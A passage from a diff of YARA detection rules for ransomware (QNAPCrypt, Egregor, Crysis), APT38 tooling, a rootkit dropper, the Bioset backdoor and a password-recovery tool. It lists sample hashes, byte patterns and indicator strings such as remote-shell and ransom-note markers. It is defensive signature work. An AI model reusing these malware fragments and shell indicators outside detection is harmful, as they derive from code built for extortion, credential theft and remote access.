73 } + $dbg6 = { 25 73 5f 6d 61 69 6e } + $dbg7 = { 25 73 5f 66 69 6e } + $dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii + $s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 } + $s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc } condition: - uint16(0)==0xcfd0 and filesize <5000KB and 1 of ($x*) and 4 of them + uint16(0)==0x5a4d and filesize >30KB and 6 of ($dbg*) and all of ($s*) } -rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE { meta: - description = "Detect QNAPCrypt ransomware (x86 version)" + description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38" author = "Arkbird_SOLG" - id = "fcdec43a-de70-57a2-9527-263685acc820" - date = "2021-08-11" - modified = "2021-08-12" - reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29" - license_url = "N/A" - logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf" - score = 75 - quality = 71 + id = "74a20725-3e52-5fef-9934-c812137dc989" + date = "2021-03-23" + modified = "2021-03-24" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22" + license_url = "N/A" + logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a" + score = 50 + quality = 67 tags = "FILE" - hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467" - hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36" - hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b" - hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349" - tlp = "white" - adversary = "-" + hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60" + level = "experimental" strings: - $s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 } - $s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 } - $s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a } - $s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa } - $s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c } - $s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 } - $x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd } - $x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff } - $x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 } - $x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 } - $x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 } - $x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 } + $dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 } + $dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 } + $dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 } + $dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d } + $dbg5 = { 25 73 25 73 2e 64 6c 6c } + $dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 } + $dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 } + $s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff } + $s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 } condition: - uint32(0)==0x464C457F and filesize >25KB and 3 of ($s*) and 2 of ($x*) + uint16(0)==0x5a4d and filesize >30KB and 5 of ($dbg*) and 1 of ($s*) } -rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE +rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE { meta: - description = "Detect QNAPCrypt ransomware (x64 version)" + description = "Detect Egregor ransomware (variant Sept2020)" author = "Arkbird_SOLG" - id = "8cd54646-87da-5261-82f3-68ab96549379" - date = "2021-08-11" - modified = "2021-08-12" - reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22" + id = "b44b93ec-b470-511e-b08f-7d83efd30ecc" + date = "2020-10-07" + modified = "2020-10-16" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22" license_url = "N/A" - logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4" + logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8" - hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b" - hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e" - tlp = "white" - adversary = "-" + hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321" + hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7" + hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f" + hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb" + hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332" strings: - $s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 } - $s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 } - $s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 } - $s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec } - $s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 } - $s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 } + $x1 = "dmocx.dll" fullword ascii + $s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide + $s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii + $s4 = "Type Descriptor'" fullword ascii + $s5 = "=$=`=h=p=t=x=|=" fullword ascii + $s6 = "--nop" fullword wide + $s7 = "9,94989@9X9" fullword ascii condition: - uint32(0)==0x464C457F and filesize >25KB and all of ($s*) + uint16(0)==0x5a4d and filesize >200KB and 1 of ($x*) and 4 of ($s*) } -rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE { meta: - description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past" + description = "Detect Crysis ransomware" author = "Arkbird_SOLG" - id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593" - date = "2020-11-30" - modified = "2020-11-30" + id = "9cc1a1b9-c4a9-5add-833d-81be02ffc4fb" + date = "2020-10-16" + modified = "2020-10-16" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Crysis_Sep_2020_1.yar#L1-L23" license_url = "N/A" - logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10" + logic_hash = "c7706b862cd0277c8b726d32dc819ad7e15933b28e3a31599922f3dc0beb8348" score = 75 - quality = 75 + quality = 69 tags = "FILE" - hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802" - hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e" + hash1 = "34c485ad11076ede709ff409c0e1867dc50fd40311ae6e7318ddf50679fa4049" + hash2 = "4708750c9a6fdeaec5f499a3cd26bb5f61db4f82e66484dc7b44118effbb246f" + hash3 = "b565c8e1e81796db13409f37e4bd28877272b5e54ab5c0a3d9b6a024e7f5a039" + hash4 = "8e8b6818423930eea073315743b788aef2f41198961946046b7b89042cb3f95a" strings: - $dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a } - $dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a } - $dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a } - $dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a } - $dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a } - $dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a } - $dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a } - $dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a } - $dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b } + $s1 = { 6f 25 25 4a 72 2e 2e 5c 24 } + $s2 = { 52 53 44 53 25 7e 6d } + $s3 = { 78 78 4a 6f 25 25 5c 72 2e 2e 38 24 } + $s4 = { 25 65 65 ca af 7a 7a f4 8e ae ae 47 e9 08 08 10 18 ba ba } + $s5 = { 58 74 1a 1a 34 2e 1b 1b 36 2d 6e 6e dc b2 5a 5a b4 ee a0 a0 5b fb 52 52 a4 f6 3b 3b 76 4d d6 d6 b7 61 b3 b3 7d ce 29 29 52 7b e3 e3 dd 3e 2f 2f 5e 71 84 84 13 97 53 53 } + $s6 = { 3b 32 32 64 56 3a 3a 74 4e 0a 0a 14 1e 49 49 92 db 06 06 0c 0a 24 24 48 6c 5c 5c b8 e4 c2 c2 9f 5d d3 d3 bd 6e ac ac 43 ef 62 62 } + $s7 = { 26 4c 6a 26 36 6c 5a 36 3f 7e 41 3f f7 f5 02 f7 cc 83 4f cc 34 68 5c 34 a5 51 f4 a5 e5 d1 34 e5 f1 f9 08 f1 71 e2 93 71 d8 ab 73 d8 31 62 53 31 15 2a 3f 15 04 08 0c 04 c7 95 52 c7 23 46 65 23 } + $s8 = { 7e fc 82 7e 3d 7a 47 3d 64 c8 ac 64 5d ba e7 5d 19 32 2b 19 73 e6 95 73 60 c0 a0 60 81 19 98 81 4f 9e d1 4f dc a3 7f dc 22 44 66 22 2a 54 7e 2a 90 3b ab 90 88 0b 83 88 46 8c ca 46 ee c7 29 } + $s9 = "sssssbsss" fullword ascii condition: - uint16(0)==0x4d5a and filesize >50KB and 6 of them + uint16(0)==0x5a4d and filesize >30KB and all of them } -rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_ELF_Bioset_Jul_2021_1 : FILE { meta: - description = "Detect the dropper of Netfilter rootkit" + description = "Detect the Bioset malware" author = "Arkbird_SOLG" - id = "5e67c99c-6b08-5190-9c8a-55086c20923e" - date = "2020-06-18" - modified = "2021-06-18" - reference = "https://twitter.com/struppigel/status/1405483373280235520" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20" + id = "1b95c3df-7543-521c-a28b-d540ad0bd648" + date = "2021-07-02" + modified = "2021-07-05" + reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Bioset/MAL_ELF_Bioset_Jul_2021_1.yara#L1-L26" license_url = "N/A" - logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78" + logic_hash = "b5ba7f4517f07d8657cbd54695cad88d8c2f263ee010bd70c4a05433b2927576" score = 75 quality = 75 tags = "FILE" - hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac" - hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9" - hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540" + hash1 = "3afe2ec273608be0b34b8b357778cc2924c344dd1b00a84cf90925eeb2469964" + hash2 = "3de97c2b211285022a34a62b536cef586d987939d40d846930c201d010517a10" + hash3 = "b00157dbb371e8abe19a728104404af61acc3c5d4a6f67c60e694fe0788cb491" + hash4 = "7fa37dd67dcd04fc52787c5707cf3ee58e226b98c779feb45b78aa8a249754c7" + hash5 = "79e93f6e5876f31ddc4a6985b290ede6a2767d9a94bdf2057d9c464999163746" tlp = "White" - adversary = "Chinese APT Group" + adversary = "-" strings: - $seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 } - $seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 } - $s1 = "%s\\netfilter.sys" fullword ascii - $s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii - $s3 = "\\\\.\\netfilter" fullword ascii + $s1 = "exec bash --login" fullword ascii + $s2 = { 55 48 89 e5 53 48 83 ec 48 48 89 7d b8 48 c7 45 d8 [2] 40 00 48 c7 45 d0 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 eb 30 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 89 c2 8b 45 e8 01 d0 83 c0 01 89 45 e8 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 85 c0 75 b4 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 18 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 48 83 c0 01 48 01 d8 48 89 45 d0 8b 45 e8 48 98 48 89 c7 e8 ?? fb ff ff 48 89 45 e0 c7 45 ec 00 00 00 00 eb 74 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 10 48 8b 45 e0 48 89 d6 48 89 c7 e8 ?? f9 ff ff 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? f9 ff ff 89 45 cc 8b 45 cc 48 98 48 83 c0 01 48 01 45 e0 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 c2 48 8b 45 e0 48 89 02 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 } + $s3 = "amcsh_connect" fullword ascii + $s4 = "GOT HAHA: %d" fullword ascii + $s5 = { 52 65 63 76 65 64 20 74 65 72 6d 20 65 6e 76 20 76 61 72 3a 20 25 73 00 77 69 6e 3a 25 64 2c 25 64 } + $s6 = { 55 48 89 e5 48 81 ec f0 20 00 00 89 bd 1c df ff ff 48 c7 45 f0 [2] 40 00 48 8d 85 20 df ff ff be 01 20 00 00 48 89 c7 e8 ?? fa ff ff 48 8d b5 28 ff ff ff 48 8d 85 2c ff ff ff 41 b8 00 00 00 00 b9 00 00 00 00 ba 00 00 00 00 48 89 c7 e8 ?? fa ff ff 85 c0 79 2a e8 ?? f8 ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 26 fc ff ff b8 01 00 00 00 e9 f8 05 00 00 8b 85 28 ff ff ff 89 c7 e8 ?? fa ff ff 48 89 45 e8 48 83 7d e8 00 75 0a b8 01 00 00 00 e9 d6 05 00 00 bf [2] 40 00 e8 ?? f9 ff ff 48 8d 95 20 df ff ff 8b 85 1c df ff ff 48 89 d6 89 c7 e8 ?? 17 00 00 89 45 fc 83 7d 